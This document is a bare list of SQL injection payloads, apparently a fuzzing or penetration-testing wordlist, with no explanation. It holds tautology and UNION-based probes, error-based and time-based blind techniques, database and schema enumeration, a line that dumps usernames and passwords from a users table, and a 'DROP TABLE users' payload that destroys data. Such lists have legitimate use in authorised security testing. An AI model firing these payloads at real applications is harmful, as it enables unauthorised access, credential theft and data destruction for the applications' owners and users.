1 OR 1=1
1 AND 1=1
1 AND 1=2
1 OR 1=1 --
1 OR 1=1#
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
1 UNION SELECT 1,2,3--
1 ORDER BY 1--
1 ORDER BY 10--
1; SELECT pg_sleep(5)--
-1 UNION SELECT 1,2,3--
1 AND SLEEP(5)--
1 HAVING 1=1--
1 GROUP BY 1 HAVING 1=1--
1 AND 1=CONVERT(int,@@version)--
1 AND extractvalue(1,concat(0x7e,version()))--
1 AND updatexml(1,concat(0x7e,version()),1)--
1 AND (SELECT COUNT(*) FROM information_schema.tables)>0--
1 AND SUBSTRING(@@version,1,1)=5
-1 UNION SELECT table_name,NULL FROM information_schema.tables--
-1 UNION SELECT column_name,NULL FROM information_schema.columns--
1; WAITFOR DELAY 0:0:5--
1 AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
1 UNION ALL SELECT NULL,NULL,NULL--
1 UNION SELECT username,password FROM users--
1; DROP TABLE users--
1 AND ASCII(SUBSTRING(version(),1,1))>51--
1 BENCHMARK(5000000,MD5(1))--
